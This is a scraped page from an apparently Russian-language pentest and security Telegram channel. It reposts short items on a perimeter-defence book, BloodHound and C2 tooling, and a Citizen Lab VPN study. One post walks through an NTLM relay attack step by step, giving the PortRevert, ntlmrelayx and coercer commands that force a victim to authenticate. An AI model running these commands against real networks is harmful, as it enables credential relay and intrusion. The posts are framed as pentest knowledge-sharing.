es
Feedback
Fsecurity | HH

Fsecurity | HH

Ir al canal en Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Mostrar más
2 075
Suscriptores
Sin datos24 horas
+27 días
+330 días
Archivo de publicaciones
🔗Ссылка: https://opennet.ru/63753/

Сегодня у нас чтиво о защите периметра сети - Архитектура защищённости сетей. В данной книге разбираются такие типы СЗИ как NGFW, Email Security, WAF и Sandbox. Список самих обозреваемых решений довольно большой, начиная от циски и майкрософта, заканчивая нашими решениями от PT, Usergate и т.д. Прочитав эту книгу вы сможете понять, цель каждого из описанных СЗИ и в какую часть сети их нужно внедрять. #AppSec #DevSecOps #SecArch 🧠 Пакет Знаний | 👨‍🏫 Менторство 📂 Другие каналы

Repost from 1N73LL1G3NC3
🐶 vCenterHound Collect infrastructure and permissions data from vCenter and export it as a BloodHound‑compatible graph using
🐶 vCenterHound Collect infrastructure and permissions data from vCenter and export it as a BloodHound‑compatible graph using Custom Nodes/Edges

Repost from Adaptix Framework
В начале месяца мне на глаза попался репозиторий PIC агента Kharon. Несмотря на то, что он находится в активной разработке, я
В начале месяца мне на глаза попался репозиторий PIC агента Kharon. Несмотря на то, что он находится в активной разработке, я решил выделить денек-второй, чтобы встроить его в AdaptixC2. Как итог, за 11 часов удалось разобраться в работе самой нагрузки, а также написать экстендеры листенера и агента. Агент отлично работает, поддерживает браузеры файловой системы и процессов, при этом код агента не был никак модифицирован или изменен, работает сразу с оригинального репозитория на гитхаб.

Repost from #memekatz
Реальность сегодняшнего дня - AI Every where…
Реальность сегодняшнего дня - AI Every where…

🔗Ссылка: https://www.securitylab.ru/news/562490.php P.s. уже кидал разбор, но вот ещё

Использовали VPN из списка?
Anonymous voting

Repost from SecAtor
Ресерчеры Citizen Lab выкатили результаты своих исследований безопасности ряда популярных VPN-приложений, доступных в магазин
Ресерчеры Citizen Lab выкатили результаты своих исследований безопасности ряда популярных VPN-приложений, доступных в магазине Google Play. Оказалось, что многие из VPN-приложений реализуются с одним и тем же паролем Shadowsocks, жёстко зашитым в исходный код, который позволяет владельцам таких приложений расшифровывать пользовательский трафик. Причем, по данным CitizenLab, эти приложения зарегистрированы на три подставные компании, управление которыми осуществляется с территории Китая. Другие весьма интригующие детали представлены в отчете (PDF) и, вероятно, приоткроют для многих завесу в вопросах «безопасности и конфиденциальности» при использовании подобных сервисов.

Repost from Похек
Мой коллега-внутрянщик написал очень полезный инструмент PortRevert #AD #pentest #Microsoft #NTLM #relay PortRevert — этот ин
Мой коллега-внутрянщик написал очень полезный инструмент PortRevert #AD #pentest #Microsoft #NTLM #relay PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445). ➡️Возможности - Перехват всего TCP трафика на порт 445 - Перенаправление на порт 4445 для ntlmrelayx - Автоматическая обработка двунаправленного трафика (запросы/ответы) - Корректная очистка драйвера при завершении - Поддержка как x86, так и x64 архитектур ➡️Использование Пример использования для NTLM relay 1. Запустите PortRevert от имени администратора:
PortRevert.exe
2. Запустите ntlmrelayx на порту 4445:
ntlmrelayx.exe -smb-port 4445 -smb2support -debug
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
coercer coerce -d cs.org -t dc1 -u test -p 'Password123!' -l pc3 --always-continue
(PortRevert должен быть запущен на хосте-слушателе, в данном случае - pc3)
➡️Как это работает
Жертва -> Порт 445 
    ↓ (перехват PortRedirector)
Жертва -> Порт 4445 -> ntlmrelayx
    ↓ (ответы)
ntlmrelayx -> Порт 4445 
    ↓ (перенаправление обратно)
ntlmrelayx -> Порт 445 -> Жертва
💻 Github repo 🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

🔗Ссылка: https://opennet.ru/63740/